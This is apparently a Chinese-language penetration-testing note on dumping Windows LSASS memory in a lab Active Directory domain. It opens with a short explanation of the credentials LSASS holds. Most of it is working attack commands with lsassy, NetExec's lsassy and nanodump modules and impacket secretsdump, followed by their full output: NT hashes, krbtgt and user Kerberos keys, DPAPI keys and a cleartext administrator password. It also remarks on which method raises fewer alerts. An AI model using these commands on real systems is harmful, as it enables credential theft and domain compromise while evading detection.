LSASS
1. 什么是LSASS
本地安全授权子系统服务 (LSASS) 是一项 Windows 服务,也是一个系统进程,它负责在系统上强制执行安全策略、处理用户身份验证以及在内存中存储敏感凭据信息。只有拥有管理员权限的用户才能获取这些信息(无论是在本地还是远程)
此过程会把多种形式的凭证数据存储在内存当中:
- NT哈希
- Kerberos票据
- 明文密码(如果开启了WDigest,常见于旧系统)
- DPAPI 主密钥(用于解密用户加密的密钥)
- 用于 Kerberos 的 AES 加密密钥
1.1. 重要性
与仅能获取本地帐户哈希值的 SAM 数据库攻击不同,LSASS 内存包含计算机上所有活动会话用户的凭据。在域控制器上,这意味着包含域管理员、服务帐户以及所有近期已通过身份验证的域用户的凭据,此外,LSASS 还存储 Kerberos 票据,可用于PTT攻击
1.2. 登录流程
首次登录时,LSASS 将执行以下操作:
- 将凭据缓存到本地内存中
- 创建access tokens(这里为主令牌)
- 执行安全策略
- 写入Windows安全日志
2. 转储 LSASS 进程内存
2.1. 远程转储
2.1.1. lsassy 远程转储
lsassy 是一个 Python 工具,它可以远程转储 LSASS 内存并直接解析凭据。它通过 SMB 连接,使用各种转储方法转储 LSASS,检索转储文件,并在本地解析该文件,所有操作都在一个命令中完成
┌──(root㉿kali)-[~] └─# lsassy -u administrator -p Admin123! -d rain.local 192.168.8.110 192.168.8.110 - RAIN\Administrator [NT] 520126a03f5d5a8d836f1c4f34ede7ce | [SHA1] 6ae2130ee55dd7d817c02435f722215d67e9f5bc 192.168.8.110 - RAIN\DC01$ [NT] e24d59dca0277fad1f3c56e943dca8c2 | [SHA1] d9bba2b1cb0f68be5fc8a1978bf8a2b58265359d 192.168.8.110 - rain.local\DC01$ [PWD] 55c8afd242f123b98dc846e4628ff895b7e43888a162fb1b05a29afc4a6431da13d1bea85945b15b144241c4c7ee452d9c4668e2a62a1cb3a490130f75bfbab8ccbe346a9529170b1add346828a159ee1b7f9d95819f983b1e409a737a206294e921d7e0c91f1d95bcd0483f131a9ccdf45cb134db76a6a48576419bb6d894d03948cb4e157f2e378d191d38de13c06a9c9a20ee7b42f5478f5b61267c18cd2c3788d9ed51810c14283e2ec6c7f4ec9239259d956973067151a54488831b072be7c8e1c674371d386db799dbba06c43260c7b6a961516b276b48416033dfba40d3e5407bd05afcf63697506f05ca667c 192.168.8.110 - RAIN.LOCAL\DESKTOP-SAQRM8B$ [TGT] Domain: RAIN.LOCAL - End time: 2026-04-19 19:45 (TGT_RAIN.LOCAL_DESKTOP-SAQRM8B$_krbtgt_RAIN.LOCAL_59c012a8_20260419194518.kirbi) 192.168.8.110 - RAIN.LOCAL\Administrator [TGT] Domain: RAIN.LOCAL - End time: 2026-04-19 23:25 (TGT_RAIN.LOCAL_Administrator_krbtgt_RAIN.LOCAL_2a76f622_20260419232534.kirbi) 192.168.8.110 - RAIN.LOCAL\DC01$ [TGT] Domain: RAIN.LOCAL - End time: 2026-04-19 20:30 (TGT_RAIN.LOCAL_DC01$_krbtgt_RAIN.LOCAL_bd427ad5_20260419203027.kirbi) 192.168.8.110 - RAIN.LOCAL\DC01$ [TGT] Domain: RAIN.LOCAL - End time: 2026-04-19 20:30 (TGT_RAIN.LOCAL_DC01$_krbtgt_RAIN.LOCAL_16e7a97a_20260419203027.kirbi) 192.168.8.110 - RAIN.LOCAL\DC01$ [TGT] Domain: RAIN.LOCAL - End time: 2026-04-19 19:30 (TGT_RAIN.LOCAL_DC01$_krbtgt_RAIN.LOCAL_af3cfb1b_20260419193058.kirbi) 192.168.8.110 - RAIN.LOCAL\DC01$ [TGT] Domain: RAIN.LOCAL - End time: 2026-04-19 19:30 (TGT_RAIN.LOCAL_DC01$_krbtgt_RAIN.LOCAL_736b7135_20260419193058.kirbi) 24 Kerberos tickets written to /root/.config/lsassy/tickets 5 masterkeys saved to /root/.config/lsassy/masterkeys.txt
告警
2.1.2. NetExec的 lsassy模块
┌──(root㉿kali)-[~] └─# nxc smb 192.168.8.110 -u administrator -p Admin123! -M lsassy SMB 192.168.8.110 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rain.local) (signing:True) (SMBv1:None) (Null Auth:True) SMB 192.168.8.110 445 DC01 [+] rain.local\administrator:Admin123! (Pwn3d!) LSASSY 192.168.8.110 445 DC01 Saved 23 Kerberos ticket(s) to /root/.nxc/modules/lsassy LSASSY 192.168.8.110 445 DC01 RAIN\Administrator 520126a03f5d5a8d836f1c4f34ede7ce
库库告警
2.1.3. nxc nanodump模块
┌──(root㉿kali)-[~] └─# nxc smb 192.168.8.110 -u administrator -p Admin123! -M nanodump SMB 192.168.8.110 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rain.local) (signing:True) (SMBv1:None) (Null Auth:True) SMB 192.168.8.110 445 DC01 [+] rain.local\administrator:Admin123! (Pwn3d!) NANODUMP 192.168.8.110 445 DC01 [*] 64-bit Windows detected. NANODUMP 192.168.8.110 445 DC01 [+] Created file nano.exe on the \\C$\Windows\Temp\ NANODUMP 192.168.8.110 445 DC01 [*] Getting LSASS PID via command tasklist /v /fo csv | findstr /i "lsass" NANODUMP 192.168.8.110 445 DC01 [*] Executing command C:\Windows\Temp\nano.exe --pid 632 --write C:\Windows\Temp\20260419_1015.log NANODUMP 192.168.8.110 445 DC01 [+] Process lsass.exe was successfully dumped NANODUMP 192.168.8.110 445 DC01 [*] Copying 20260419_1015.log to host NANODUMP 192.168.8.110 445 DC01 [+] Dumpfile of lsass.exe was transferred to /tmp/DC01_64_rain.local.log NANODUMP 192.168.8.110 445 DC01 [+] Deleted nano file on the C$ share NANODUMP 192.168.8.110 445 DC01 [+] Deleted lsass.dmp file on the C$ share NANODUMP 192.168.8.110 445 DC01 RAIN\Administrator:520126a03f5d5a8d836f1c4f34ede7ce
Nanodump 使用间接系统调用和内存操作技术,噪音会低一些
测试下来只有low
2.1.4. impacket-secretsdump
┌──(root㉿kali)-[~] └─# secretsdump.py 'administrator:Admin123!@192.168.8.110' Impacket v0.14.0.dev0+20260320.93755.d400a6aa - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0xde0854409bbc2e2f887d8e2ffdcc39a5 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:520126a03f5d5a8d836f1c4f34ede7ce::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC RAIN\DC01$:aes256-cts-hmac-sha1-96:21b70e860448128f9f7eab0a70c4cbffa7dd9f59501d2b5616c68198225f63f0 RAIN\DC01$:aes128-cts-hmac-sha1-96:73296fd01eb6badec1cc626f82b0ff43 RAIN\DC01$:des-cbc-md5:61ce5d02bcc48019 RAIN\DC01$:plain_password_hex:55c8afd242f123b98dc846e4628ff895b7e43888a162fb1b05a29afc4a6431da13d1bea85945b15b144241c4c7ee452d9c4668e2a62a1cb3a490130f75bfbab8ccbe346a9529170b1add346828a159ee1b7f9d95819f983b1e409a737a206294e921d7e0c91f1d95bcd0483f131a9ccdf45cb134db76a6a48576419bb6d894d03948cb4e157f2e378d191d38de13c06a9c9a20ee7b42f5478f5b61267c18cd2c3788d9ed51810c14283e2ec6c7f4ec9239259d956973067151a54488831b072be7c8e1c674371d386db799dbba06c43260c7b6a961516b276b48416033dfba40d3e5407bd05afcf63697506f05ca667c RAIN\DC01$:aad3b435b51404eeaad3b435b51404ee:e24d59dca0277fad1f3c56e943dca8c2::: [*] DefaultPassword RAIN\Administrator:Admin123! [*] DPAPI_SYSTEM dpapi_machinekey:0x469170ec0c4b448ba5872b412a91031817b51e6e dpapi_userkey:0x25c6bb2b1e15e8da6eab7dc1d143a5af80fed837 [*] NL$KM 0000 57 3A CF 72 0D 9D 78 BF A4 46 8B E5 51 4F 3F F4 W:.r..x..F..QO?. 0010 A9 01 5E 07 47 A6 88 18 3A 9F D6 19 4A D3 AA 76 ..^.G...:...J..v 0020 E0 AE B4 FA B4 A0 15 5D F1 90 E8 63 72 DA 87 CE .......]...cr... 0030 33 C8 EF 78 D2 3A E7 DF 93 AA 7E 9E 02 80 F4 E0 3..x.:....~..... NL$KM:573acf720d9d78bfa4468be5514f3ff4a9015e0747a688183a9fd6194ad3aa76e0aeb4fab4a0155df190e86372da87ce33c8ef78d23ae7df93aa7e9e0280f4e0 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:520126a03f5d5a8d836f1c4f34ede7ce::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5276f6f759a6516faa84ad3c66ff7415::: tao:1103:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03::: bilir:1104:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03::: eric:1105:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03::: tom:1106:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03::: hyh:1107:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03::: c1trus:1108:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03::: DC01$:1000:aad3b435b51404eeaad3b435b51404ee:e24d59dca0277fad1f3c56e943dca8c2::: DESKTOP-SAQRM8B$:1109:aad3b435b51404eeaad3b435b51404ee:67f8f834b5e8404da470ab4191588a6f::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:b69a234bfa2498ca62f7dba565bf625e3ee2580dd7f0cc823f31810f58dd9b50 Administrator:aes128-cts-hmac-sha1-96:d76c707666649ef660a70eb37377a04f Administrator:des-cbc-md5:c1c2b3fe3e19a21f krbtgt:aes256-cts-hmac-sha1-96:918ac53bf1205e1d104f475fc1e5152ec098539fd8e8af0addb4d664d3cc5741 krbtgt:aes128-cts-hmac-sha1-96:bebc49c970a55abc531b64ce4112538d krbtgt:des-cbc-md5:044692bf1f8a8f2a tao:aes256-cts-hmac-sha1-96:63c323e0091873cfdde03f7ef388c68c1e81955325d77bf0d8004f315932f977 tao:aes128-cts-hmac-sha1-96:6f3fe07aca976f2986b102ee8e82a222 tao:des-cbc-md5:79f8a28a64a1a42a bilir:aes256-cts-hmac-sha1-96:df8beeb0d992edef8cefc93ab08d210a81aee10dfddfc5d6043adcdcd3af2ae9 bilir:aes128-cts-hmac-sha1-96:28dc2ea29592837a2fc0b99bb7381310 bilir:des-cbc-md5:e39234c4c18f97da eric:aes256-cts-hmac-sha1-96:565007ecc504883d4f1f63c7dd3b2dded0bb7a9239803835cfa76aba7c865345 eric:aes128-cts-hmac-sha1-96:428006fb09d5b883faaebf6ccd4c4a96 eric:des-cbc-md5:768a31f2a1ec26d3 tom:aes256-cts-hmac-sha1-96:dddfedf83021c5bd25cd54822ca4a7498dbc3d9c81efa891c5f922e18e0f7b71 tom:aes128-cts-hmac-sha1-96:e4087385dd71bbf4fbef0ac37fbe476c tom:des-cbc-md5:765bb61a807fe931 hyh:aes256-cts-hmac-sha1-96:115ec5eec943ada56f463df2fa0222cbc93acbf5b83737459bd68cb3f1679eca hyh:aes128-cts-hmac-sha1-96:61d54bb1b7646e56c9379619ac039250 hyh:des-cbc-md5:40b6499e2f706ea2 c1trus:aes256-cts-hmac-sha1-96:4e3463f9d3342254215734a66722458bee17ba4a7644e71ab55cdba1ab46d88b c1trus:aes128-cts-hmac-sha1-96:80fe8bbaf933886e1541ac5949943ab0 c1trus:des-cbc-md5:627cd5c868979e80 DC01$:aes256-cts-hmac-sha1-96:21b70e860448128f9f7eab0a70c4cbffa7dd9f59501d2b5616c68198225f63f0 DC01$:aes128-cts-hmac-sha1-96:73296fd01eb6badec1cc626f82b0ff43 DC01$:des-cbc-md5:9eefef54513bdfb9 DESKTOP-SAQRM8B$:aes256-cts-hmac-sha1-96:cf29c67a4565f7c6771c756e8278291afcb81d6279c921ca015b9d15b5871f92 DESKTOP-SAQRM8B$:aes128-cts-hmac-sha1-96:142fd6aff9483fd8729542b58aeabc58 DESKTOP-SAQRM8B$:des-cbc-md5:8f9b5ecd132316fb [*] Cleaning up...